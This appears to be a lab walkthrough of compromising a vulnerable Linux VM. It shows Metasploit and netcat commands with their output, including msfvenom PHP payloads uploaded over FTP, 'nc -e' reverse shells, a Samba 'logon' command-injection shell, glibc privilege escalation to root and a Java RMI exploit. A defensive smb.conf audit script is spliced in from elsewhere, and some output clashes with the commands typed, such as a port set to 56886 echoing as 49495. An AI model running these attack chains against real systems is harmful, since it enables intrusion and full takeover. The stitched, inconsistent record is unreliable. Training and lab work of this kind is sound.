msf6 exploit(multi/handler) >
I need to set the same payload that I used in Msfvenom
set payload /php/meterpreter_reverse_tcp
set lhost 192.168.249.140
set lport 5566
options
msf6 exploit(multi/handler) > set payload /php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/handler) > set lport 5566
lport => 5566
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.249.140:5566

To execute the payload, I simply visit the URL 192.168.249.147/payload.php as shown in Figure 2, or run 'curl 192.168.249.147/payload.php'. The request does not return while the session is alive, because the PHP payload keeps running inside the Apache worker that served it
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ curl 192.168.249.147/payload.php
[*] Meterpreter session 1 opened (192.168.249.140:5566 -> 192.168.249.147:57775 ) at 2022-03-28 14:48:03 +0800
meterpreter >
I will proceed to examine the Meterpreter session that I managed to gain
getuid
sysinfo
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : custom1
OS : Linux custom1 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux
meterpreter >
🤔💭 The 'www-data' user has low privileges, so I will need to escalate
I will try the Msfconsole local exploit suggester to see if there are any potential exploits available
First, I will send the Meterpreter session to the background
background
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) >
search suggester
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) >
I will use the suggester and point it at the Meterpreter session, 'session 1'
use post/multi/recon/local_exploit_suggester
set session 1
options
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) >
run
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.249.147 - Collecting local exploits for php/linux...
[-] 192.168.249.147 - No suggestions available.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > [*] 192.168.249.147 - Meterpreter session 1 closed. Reason: Died
Interrupt: use the 'exit' command to quit
msf6 post(multi/recon/local_exploit_suggester) >
🤔💭 No suggestions were available and the Meterpreter session closed; the session was not a stable one
📔 Note: If the error is instead a 'segmentation fault', it may be caused by using the staged payload 'linux/x86/shell/reverse_tcp' instead of the stageless 'linux/x86/shell_reverse_tcp'
Reference: https://github.com/rapid7/metasploit-framework/issues/12142#issuecomment-516057212
👍 Exploitation: "Succeeded" FTP / Apache (Msfvenom Payload)
I will use the 'php/exec' payload with Msfvenom next. Its only option is CMD, the command that PHP's system() will run, so the lhost and lport arguments in the command below are not used by this payload; the listener address and port live entirely inside the 'nc' command string
msfvenom -p php/exec cmd='nc 192.168.249.140 7777 -e /bin/sh' lhost=192.168.249.140 lport=7777 -f raw -o phpexec.php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ msfvenom -p php/exec cmd='nc 192.168.249.140 7777 -e /bin/sh' lhost=192.168.249.140 lport=7777 -f raw -o phpexec.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1378 bytes
Saved as: phpexec.php
I will upload the 'phpexec.php' payload via FTP port 2121 using the leaked credentials from earlier
ftp 192.168.249.147 2121
put phpexec.php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ ftp 192.168.249.147 2121
Connected to 192.168.249.147.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.249.147]
Name (192.168.249.147:kali): xxxx
331 Password required for xxxx
Password:
230 User xxxx logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put phpexec.php
local: phpexec.php remote: phpexec.php
229 Entering Extended Passive Mode (|||40553|)
150 Opening BINARY mode data connection for phpexec.php
100% |***********************************************************************************************| 1378 12.75 MiB/s 00:00 ETA
226 Transfer complete
1378 bytes sent in 00:00 (2.59 MiB/s)
ftp>
👍 Exploitation: "Succeeded" Listener (Msfconsole)
Start msfconsole, use the exploit, set the payload and execute run. The process is the same as in the earlier example
msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lhost 192.168.249.140
set lport 7777
options
run
┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.249.140:7777

After the reverse TCP handler has started, I will visit the URL of 'phpexec.php' to trigger the payload, as shown in Figure 3, or execute 'curl 192.168.249.147/phpexec.php'
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ curl 192.168.249.147/phpexec.php
I managed to gain a command shell session. The 'whoami' command was executed to check the name of the user
whoami
[*] Command shell session 1 opened (192.168.249.140:7777 -> 192.168.249.147:51175 ) at 2022-03-28 19:06:39 +0800
whoami
www-data
🤔💭 I will need to escalate privilege as the current user is 'www-data'
I sent the command shell session to the background, then searched for and used the 'suggester'
search suggester
use post/multi/recon/local_exploit_suggester
set session 1
options
[*] Command shell session 1 opened (192.168.249.140:7777 -> 192.168.249.147:51175 ) at 2022-03-28 19:06:39 +0800
whoami
www-data
^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) >
run
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.249.147 - Collecting local exploits for x86/linux...
[*] 192.168.249.147 - 39 exploit checks are being tried...
[+] 192.168.249.147 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 192.168.249.147 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 192.168.249.147 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.249.147 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
[+] 192.168.249.147 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Post module execution completed
I will use 'exploit/linux/local/glibc_ld_audit_dso_load_priv_esc' from the list and set the payload to use
use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.249.140
set lport 7777
set session 1
options
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 192.168.249.140
=> 192.168.249.140
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 7777
lport => 7777
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options
Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SUID_EXECUTABLE /bin/ping yes Path to a SUID executable
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) >
run
getuid
sysinfo
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run
[*] Started reverse TCP handler on 192.168.249.140:7777
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.466awTG' (1271 bytes) ...
[*] Writing '/tmp/.v9MErF' (281 bytes) ...
[*] Writing '/tmp/.WzQ5NnlMC' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (989032 bytes) to 192.168.249.147
[*] Meterpreter session 2 opened (192.168.249.140:7777 -> 192.168.249.147:57938 ) at 2022-03-28 19:11:17 +0800
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.249.147
OS : Ubuntu x8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
😄 Finally managed to gain the user 'root'!
👌 Enumeration: "It Worked" Samba (SMBmap)
I will use SMBmap to scan the target's port that is running the Samba service to find potential information
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
smbmap -H 192.168.249.147 -P 139
┌──(kali㉿kali)-[~/custom1]
└─$ smbmap -H 192.168.249.147 -P 139
[+] IP: 192.168.249.147:139 Name: 192.168.249.147
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (custom1 server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (custom1 server (Samba 3.0.20-Debian))
🤔💭 smbmap showed that there is a 'tmp' directory with 'Read, Write' permissions
Disk Permissions Comment
---- ----------- -------
tmp READ, WRITE oh noes!
👍 Exploitation: "Succeeded" Samba (NC / SMBClient)
Using smbclient to check for anonymous login access
smbclient -L 192.168.249.147
Press 'Enter' when prompted for a password
┌──(kali㉿kali)-[~]
└─$ smbclient -L 192.168.249.147
Enter WORKGROUP\kali's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (custom1 server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (custom1 server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP custom1
Start a listener
nc -nlvp 5566
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 5566
listening on [any] 5566 ...
Open another terminal window and access the target's 'tmp' directory
smbclient //192.168.249.147/tmp
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.249.147/tmp
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

Figure 4 above shows two open terminals:
Left terminal: listener
Right terminal: smbclient
Execute the following 'logon' command to make a reverse shell connection
logon "/=`nc 192.168.249.140 5566 -e /bin/bash`"
Press 'Enter' when prompted for a password
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.249.147/tmp
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nc 192.168.249.140 5566 -e /bin/bash`"
Password:
smb: \>
The netcat terminal will receive a connection with a shell session
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 5566
listening on [any] 5566 ...
connect to [192.168.249.140] from (UNKNOWN) [192.168.249.147] 56735
whoami
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 5566
listening on [any] 5566 ...
connect to [192.168.249.140] from (UNKNOWN) [192.168.249.147] 56735
whoami
root
😄 It returned with a shell session and upon executing 'whoami', 'root' user was displayed
👍 Exploitation: "Succeeded" Samba (Msfconsole)
search Samba 3.0.20
msf6 > search Samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 >

🤔💭 The above result did not mention the exact Samba 3.0.20 version. However, I will give it a try since it was ranked 'excellent'
options
set lport 5566 (I will usually not use the default 4444)
set lhost 192.168.249.140 <localhost IP>
set rhosts 192.168.249.147 <target IP>
msf6 exploit(multi/samba/usermap_script) > options
msf6 exploit(multi/samba/usermap_script) > set lport 5566
lport => 5566
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.249.147
rhosts => 192.168.249.147
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.249.147 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) >
run
whoami
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.249.140:5566
[*] Command shell session 1 opened (192.168.249.140:5566 -> 192.168.249.147:38239 ) at 2022-03-25 22:35:16 +0800
whoami
root
😄 It returned with a shell session and upon executing 'whoami', 'root' user was displayed
Executing the following command will spawn a 'prettier' shell session
python -c 'import pty;pty.spawn("/bin/bash")'
[*] Started reverse TCP handler on 192.168.249.140:5566
[*] Command shell session 1 opened (192.168.249.140:5566 -> 192.168.249.147:38239 ) at 2022-03-25 22:35:16 +0800
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@custom1:/# whoami
whoami
root
root@custom1:/#
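Both Samba findings above (an anonymously writable 'tmp' share, and the 'username map script' option that exploit/multi/samba/usermap_script relies on) are visible in smb.conf before anyone scans the box. The following is an added example, not part of the original write-up: a small Python audit that parses a constructed smb.conf (a hypothetical file modelled on the shares the scan listed, not the target's real configuration) and flags both weaknesses.

```python
"""Audit an smb.conf for the two weaknesses seen in this write-up: the
'username map script' option (what exploit/multi/samba/usermap_script relies
on) and a share that anonymous/guest users can write to."""
import configparser
import re

# Constructed sample: a hypothetical smb.conf modelled on the shares the scan
# listed (tmp writable by guests, opt locked down).  Not the target's real file.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = custom1 server
   security = user
   map to guest = Bad User            ; failed logins become the guest user
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   comment = oh noes!
   path = /tmp
   read only = no
   guest ok = yes

[opt]
   path = /opt
   read only = yes
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Return {section: {option: value}}; section and option names lower-cased
    with internal whitespace collapsed, the way Samba compares them."""
    dedented = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   inline_comment_prefixes=(";", "#"))
    cp.read_string(dedented)
    return {sec.lower(): {re.sub(r"\s+", " ", k.strip()): v.strip()
                          for k, v in cp.items(sec)}
            for sec in cp.sections()}


def _flag(share, names, default):
    """Look up a boolean option under any of its Samba synonyms."""
    for name in names:
        if name in share:
            return share[name].lower() in TRUE_VALUES
    return default


def audit_smb_conf(conf):
    """Return a list of (severity, section, message) findings."""
    findings = []
    g = conf.get("global", {})
    if g.get("username map script"):
        findings.append(("HIGH", "global",
                         "username map script = %s: remove the option (or patch Samba); "
                         "it is what the usermap_script module abuses" % g["username map script"]))
    if g.get("map to guest", "never").lower() != "never":
        findings.append(("INFO", "global",
                         "map to guest = %s: failed logins fall back to guest access" % g["map to guest"]))
    for name, share in conf.items():
        if name == "global":
            continue
        guest = _flag(share, ("guest ok", "public"), False)
        # 'read only' defaults to yes; 'writable'/'writeable' are its inverse
        # (simplified here: any explicit "writable" setting wins).
        writable = (_flag(share, ("writable", "writeable", "write ok"), False)
                    or not _flag(share, ("read only",), True))
        if guest and writable:
            findings.append(("HIGH", name, "share is writable by anonymous/guest users"))
    return findings


if __name__ == "__main__":
    for sev, sec, msg in audit_smb_conf(parse_smb_conf(SAMPLE_SMB_CONF)):
        print("[%s] [%s] %s" % (sev, sec, msg))
```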
😢 Exploitation: "Blunder" Java RMI (Msfconsole)
I had restarted the target machine; however, I was still using the previous nmap scan to try to exploit port 50981, which was running the Java RMI service
50981/tcp open java-rmi syn-ack ttl 64 GNU Classpath grmiregistry
set rport 50981 😢
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.249.147 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 50981 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.249.140:5566
[*] 192.168.249.147:50981 - Using URL: http://0.0.0.0:8080/2YcJiIfyJbDbfvC
[*] 192.168.249.147:50981 - Local IP: http://192.168.249.140:8080/2YcJiIfyJbDbfvC
[*] 192.168.249.147:50981 - Server started.
[-] 192.168.249.147:50981 - Exploit failed [unreachable]: RuntimeError The connection was refused by the remote host (192.168.249.147:50981).
[*] 192.168.249.147:50981 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >
🤔💭 I kept getting the following error no matter how I changed the parameters in the options, and I was totally clueless about what went wrong. It was perfectly fine the other day when I managed to exploit it.
[-] 192.168.249.147:50981 - Exploit failed [unreachable]: RuntimeError The connection was refused by the remote host (192.168.249.147:50981).

👍 Exploitation: "Succeeded" Java RMI (Msfconsole)
🤔💭 After a good 20-30 mins of going round in circles, I decided to give it a last shot by performing another Nmap scan
nmap -sV -p- --open 192.168.249.147
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- --open 192.168.249.147
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 23:02 +08
Nmap scan report for 192.168.249.147
Host is up (0.0035s latency).
Not shown: 65505 closed tcp ports (conn-refused), 22 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp open ftp ProFTPD 1.3.1
36398/tcp open nlockmgr 1-4 (RPC #100021)
42925/tcp open status 1 (RPC #100024)
47102/tcp open mountd 1-3 (RPC #100005)
56886/tcp open java-rmi GNU Classpath grmiregistry
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.29 seconds
🤔💭 Mystery solved: the port has changed to 56886 instead
56886/tcp open java-rmi GNU Classpath grmiregistry
Hence I started Msfconsole, searched for the exploit and ran it
msfconsole
search type:exploit java rmi
msf6 > search type:exploit java rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
1 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
2 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
4 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
5 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
6 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
7 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
8 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/totaljs_cms_widget_exec
use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.147
set rport 56886 ☺️
set lhost 192.168.249.140
set lport 5566
options
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.249.147
rhosts => 192.168.249.147
msf6 exploit(multi/misc/java_rmi_server) > set rport 56886
rport => 49495
msf6 exploit(multi/misc/java_rmi_server) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/misc/java_rmi_server) > set lport 5566
lport => 5566
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.249.147 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 56886 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
run
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.249.140:5566
[*] 192.168.249.147:56886 - Using URL: http://0.0.0.0:8080/vCZoxN3
[*] 192.168.249.147:56886 - Local IP: http://192.168.249.140:8080/vCZoxN3
[*] 192.168.249.147:56886 - Server started.
[*] 192.168.249.147:56886 - Sending RMI Header...
[*] 192.168.249.147:56886 - Sending RMI Call...
[*] 192.168.249.147:56886 - Replied to request for payload JAR
[*] Sending stage (58053 bytes) to 192.168.249.147
[*] Meterpreter session 1 opened (192.168.249.140:5566 -> 192.168.249.147:42577 ) at 2022-03-29 20:30:57 +0800
[-] 192.168.249.147:56886 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.147:56886 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >
🤔💭 I am getting the following errors:
[-] 192.168.249.147:56886 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.147:56886 - Server stopped.
[*] Exploit completed, but no session was created.
🤔💭 However, it did mention 'Meterpreter session 1 opened'. Hence, I executed 'sessions' just to check whether there was indeed one
sessions
msf6 exploit(multi/browser/java_rmi_connection_impl) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ custom1 192.168.249.140:5566 -> 192.168.249.147:42577 (192.168.249.147)
sessions 1
getuid
sysinfo
msf6 exploit(multi/browser/java_rmi_connection_impl) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : custom1
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter >
😄 Executing 'getuid' reflected that the Server username is 'root'!